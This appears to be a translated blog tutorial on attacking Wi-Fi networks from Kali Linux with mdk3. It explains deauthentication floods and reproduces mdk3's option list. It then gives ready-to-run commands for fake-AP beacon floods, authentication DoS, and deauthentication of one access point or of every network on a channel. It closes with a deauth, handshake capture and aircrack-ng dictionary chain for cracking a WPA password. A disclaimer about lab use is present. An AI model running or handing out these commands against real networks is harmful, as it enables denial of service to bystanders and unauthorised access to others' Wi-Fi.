foreword
This time I still use Kali virtual machine system, win11 host, network card Ralink 802.11
Cooperate with mdk3 to carry out wifi forgery, connected device viewing, and deauthentication attacks.
This experiment is only for learning and communication. The target of the attack is your own mobile phone hotspot. Please do not use it illegally!
Table of contents
3.1.2 Create a large number of virtual wifi
3.2 Scan for devices connected to wifi
3.3 Dos attack to designated AP
3.4 Initiate a deauthentication attack to the specified AP
4. mdk3 realizes wireless network attack
Step 1: Use mdk3 to force de-authenticate the de-connected device
Step 2: Obtain the handshake packet
Step 3: Use the password dictionary to crack the wifi password
1. Deauth attack principle
De-authentication flood attack, known internationally as De-authentication Flood Attack, the full name is de-authentication flood attack or authentication blocking flood attack, usually referred to as Deauth attack for short. A form of denial-of-service attack on a wireless network that aims to put a client into an unassociated/unauthenticated state by spoofing a deauthentication frame from the AP to the client's unicast address . This form of attack is very effective and fast at disrupting client wireless service with the wireless client adapter tools that are widely used today. Typically, the client station re-associates and authenticates to gain service again before the attacker sends another deauthentication frame. An attacker repeatedly spoofs deauthentication frames to cause a persistent denial of service for all clients.
It should be noted that
the principles of De-authenticationBroadcastAttack and De-authenticationFloodAttack are basically the same, but there are differences in the degree of transmission and the tools used, but the former is often used to cooperate with wireless man-in-the-middle Attacks, and the latter is often used in pure wireless DOS, so many wireless security materials that are not clear enough will mention the two together.
The specific steps of a deauthentication flood attack are as follows:
- Attackers first identify pre-attack targets (wireless access points and all connected wireless clients) through scanning tools.
- Inject frames containing de-authentication into normal wireless network traffic by spoofing wireless access points and wireless clients. At this point, the wireless client will think that all packets are from the wireless access point.
- After "kicking" the specified wireless client from the wireless network, the attacker can carry out the same attack on other clients, and can continue to ensure that these clients cannot connect to the AP.
- Although the client will try to connect to the AP again, it will be disconnected soon due to the attacker's continuous attack.
The following figure is the schematic diagram of de-authentication flood attack drawn by the author. It can be seen that the attacker sent a forged de-authentication message to the entire wireless network.
2. Introduction to mdk3
MDK3 (Murder Death Kill 3) is an open source wireless network attack tool that can be used for Wi-Fi function testing, vulnerability exploitation, brute force cracking, and DoS attacks . MDK3 can simulate various attack scenarios and provides many useful functions and options. The following are some common parameters of MDK3:
MDK USAGE:
mdk3 <interface> <test_mode> [test_options] #mdk3用法:mdk3 网卡 测试模式 测试选项
TEST MODES: #测试模式
b - Beacon Flood Mode #信标洪水模式 其实就是制造虚假AP干扰正常AP
OPTIONS:
-n <ssid>
Use SSID <ssid> instead of randomly generated ones #使用SSID <ssid>而不是随机生成的
-f <filename>
Read SSIDs from file #从文件中读取SSID
-v <filename>
Read MACs and SSIDs from file. #从文件读取MAC和SSID
-d
Show station as Ad-Hoc #将站显示为Ad-Hoc
-w
Set WEP bit (Generates encrypted networks) #设置WEP位(生成加密网络)
-g
Show station as 54 Mbit # 显示工作站为54M
-t
Show station using WPA TKIP encryption #使用WPA TKIP加密显示工作站
-a
Show station using WPA AES encryption #使用WPA AES加密显示工作站
-m
Use valid accesspoint MAC from OUI database #使用来自OUI数据库的有效访问点MAC
-h
Hop to channel where AP is spoofed #跳到AP被欺骗的频道
This makes the test more effective against some devices/drivers #这使得测试对于某些设备/驱动程序更有效
But it reduces packet rate due to channel hopping. #但它减少了由于信道跳频的分组速率
-c <chan>
Fake an AP on channel <chan>. If you want your card to hop on #在频道<chan>上创建AP。如果你想要你的卡上跳
this channel, you have to set -h option, too! #这个通道,你必须设置-h选项!
-s <pps>
Set speed in packets per second (Default: 50) #设置速度(以秒为单位)(默认值:50)
a - Authentication DoS mode # 身份验证洪水攻击
OPTIONS:
-a <ap_mac>
Only test the specified AP #只测试指定的AP
-m
Use valid client MAC from OUI database #从OUI数据库使用有效的客户端MAC
-c
Do NOT check for test being successful #不要检查测试是否成功
-i <ap_mac>
Perform intelligent test on AP (-a and -c will be ignored) #在AP上执行智能测试(-a和-c将被忽略)
This test connects clients to the AP and reinjects sniffed data to keep them alive #此测试将客户端连接到AP,并重新注入嗅探的数据以保持活动
-s <pps>
Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
p - Basic probing and ESSID Bruteforce mode #基本探测和ESSID Bruteforce模式
Use -f and -t option to enable SSID Bruteforcing. #使用-f和-t选项来启用SSID Bruteforcing。
OPTIONS:
-e <ssid>
Tell mdk3 which SSID to probe for # 告诉mdk3要探测的SSID
-f <filename>
Read lines from file for bruteforcing hidden SSIDs #从文件中读取行以强制执行隐藏的SSID
-t <bssid>
Set MAC adress of target AP #设置目标AP的MAC地址
-s <pps>
Set speed (Default: unlimited, in Bruteforce mode: 300) # 设置速度(默认值:无限制,在Bruteforce模式下:300)
-b <character set>
Use full Bruteforce mode (recommended for short SSIDs only!) #使用完全的Bruteforce模式(建议只使用短SSID!)
Use this switch only to show its help screen. #使用此开关仅显示其帮助屏幕
d - Deauthentication / Disassociation Amok Mode #Deauthentication / Disassociation攻击模式
Kicks everybody found from AP #踢掉每个客户端
OPTIONS:
-w <filename>
Read file containing MACs not to care about (Whitelist mode) #白名单模式 读取包含MAC的文件以运行测试
-b <filename>
Read file containing MACs to run test on (Blacklist Mode) #黑名单模式 读取文件中的运行测试MAC运行测试
-s <pps>
Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
-c [chan,chan,chan,...]
Enable channel hopping. Without providing any channels, mdk3 will hop an all #设置信道跳跃如果没指定,mdk3会跳一个
14 b/g channels. Channel will be changed every 5 seconds. #14 b / g通道。信道每5秒更改一次
m - Michael shutdown exploitation (TKIP) #MAC关闭利用
Cancels all traffic continuously #连续取消所有流量
-t <bssid>
Set Mac address of target AP #设置目标AP的Mac地址
-w <seconds>
Seconds between bursts (Default: 10) #突发之间的秒数(默认值:10)
-n <ppb>
Set packets per burst (Default: 70) #设置每个数据包的数据包(默认值:70)
-j
Use the new TKIP QoS-Exploit #使用新的TKIP QoS-Exploit
Needs just a few packets to shut AP down! #需要几个数据包才能关闭AP!
-s <pps>
Set speed (Default: 400) #设置速度(默认值:400)
w - WIDS/WIPS/WDS Confusion
将WDS与多认证客户端混淆,从而弄乱路由表
-e <SSID>
SSID of target WDS network #目标WDS网络的SSID
-c [chan,chan,chan...]
Use channel hopping #使用信道跳跃
-z
激活Zero_Chaos的WIDS攻击
(验证客户端从WDS到外部AP,使WIDS变得坚果)
f - MAC filter bruteforce mode #MAC过滤器强制模式
此测试使用已知客户端MAC地址的列表,并尝试
在动态改变的同时向给定AP认证它们
其响应超时以获得最佳性能。它目前只工作
对正确拒绝开放身份验证请求的AP
-t <bssid>
Target BSSID #目标BSSID
-m <mac>
Set the MAC adress range to use (3 bytes, i.e. 00:12:34) #设置要使用的MAC地址范围(3字节,即00:12:34)
Without -m, the internal database will be used #如果没有-m,将使用内部数据库
-f <mac>
Set the MAC adress to begin bruteforcing with #设置MAC地址以开始强制
(Note: You can't use -f and -m at the same time) #(注意:不能同时使用-f和-m)
g - WPA Downgrade test #WPA降级测试
deauthenticates发送WPA加密数据包的站和AP。
有了这个测试,你可以检查sysadmin是否会尝试设置他的
网络到WEP或禁用加密。 mdk3将使WEP和未加密
客户端工作,所以如果系统管理员只是认为“WPA是破碎”他
肯定不是这个工作的正确。
(这可以/应该与社会工程相结合)
-t <bssid>
Target network #目标网络MDK3 supports many other options and features, which can be used as needed. Please note that when using the MDK3 tool, please ensure that you are properly licensed and understand your purpose and legal restrictions on using the tool.
3. mdk actual combat
Preparation
Connect the network card:
Switch the NIC to monitor mode (monitor):
AP scan:
3.1 mdk3 creates virtual wifi
3..1.1 Create a virtual wifi
Enter the following command to create a virtual wifi called "test_wifi".
mdk3 wlan0mon b -n test_wifi
b -n: specify wifi name
3.1.2 Create a large number of virtual wifi
Enter the following command to create a large number of wifis with random names on channel 1
mdk3 wlan0mon b -g -c 1
This command will use the Beacon Flood Mode attack on the wireless interface wlan0mon,
The target is BSSID address b,
The attack channel is 1.
The -g parameter indicates the use of flood mode,
That is, beacon broadcast packets with random SSID and MAC addresses are constantly sent to interfere with the target network. In this way, the target AP can become unavailable outside of all connected devices, causing interference or attack on the target network.
After a while, dozens of wifis were created.
PS: The name of the fake AP can be created by reading the local file
mdk3 wlan0mon b -f /root/names.txt -c 6 -s 1000
This command will use Beacon Flood Mode (beacon flood mode) attack on the wireless interface wlan0mon, the target is a random BSSID, the attack channel is 6, and the randomly generated SSID will be replaced with the content in the /root/names.txt file , 1000ms. In this way, a large amount of hotspot information can be broadcast to nearby devices to interfere and mislead users of the target network.
3.2 Scan for devices connected to wifi
Use the following command to scan for devices connected to wifi. Please replace the target wifi name by yourself
mdk3 wlan0mon w -e <SSID>
3.3 Dos attack to designated AP
This is a verification request attack mode: In this mode, the software automatically simulates a randomly generated mac to send a large number of verification requests to the target AP, which can cause the AP to be busy processing too many requests and stop responding to the normal connection client; this mode is common The main use of this mode is to use the PIN code in reaver. When the AP is "pinned dead", you can use this mode to directly stop the normal response of the AP and force the AP owner to restart the route. This is not easy to use for some routers that are anti-DOS .
Enter the following command to launch a DOS attack to the specified AP. Please replace the target MAC address by yourself.
mdk3 wlan0mon a -a [MAC]
This attack seems to have no effect on my router. It may be that my router is anti-DoS or the attack time is too short and the request can be processed normally.
3.4 Initiate a deauthentication attack to the specified AP
3.4.1 Attacking a Single Ap
Use the following command to forcefully deauthenticate a disconnected device. Please replace the target MAC address by yourself
mdk3 wlan0mon d 76:87:4E:74:34:06This command uses MDK3's Deauthentication Mode (forced offline mode) to attack the specified MAC address (76:87:4E:74:34:06). During the attack, MDK3 sends a large number of deauth frames to force the target device to disconnect from the Wi-Fi network.
3.4.2 Channel (ch) attack AP
In this mode, the software will launch a cyclic attack on all visible APs around...it can cause paralysis of wireless networks within a certain range (of course there are whitelist and blacklist modes), until the attack is stopped manually
mdk3 wlan0mon d -c 11 This command uses MDK3's Deauthentication Mode (forced offline mode) to attack all connected devices on Wi-Fi channel 11. During the attack, MDK3 sends a large number of deauth frames to force the target device to disconnect from the Wi-Fi network.
Quickly ctrl c to stop, or someone will come to you!
4. mdk3 realizes wireless network attack
Step 1: Use mdk3 to force de-authenticate the de-connected device
Use mdk3 to attack the specified AP, send a deauthentication packet, and release the device connected to the AP
mdk3 wlan0mon d 76:87:4E:74:34:06At this time, wifi has failed to connect!
Step 2: Obtain the handshake packet
airodump-ng -c 1 --bssid 76:87:4E:74:34:06 -w /home/gyp-202031070222/桌面/wifi2 wlan0mon 
Step 3: Use the password dictionary to crack the wifi password
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/gyp-202031070222/桌面/wifi2-01.cap
In fact, the principle is similar to the previous deauth attack, let it disconnect and get the handshake data packet, and then crack the password dictionary!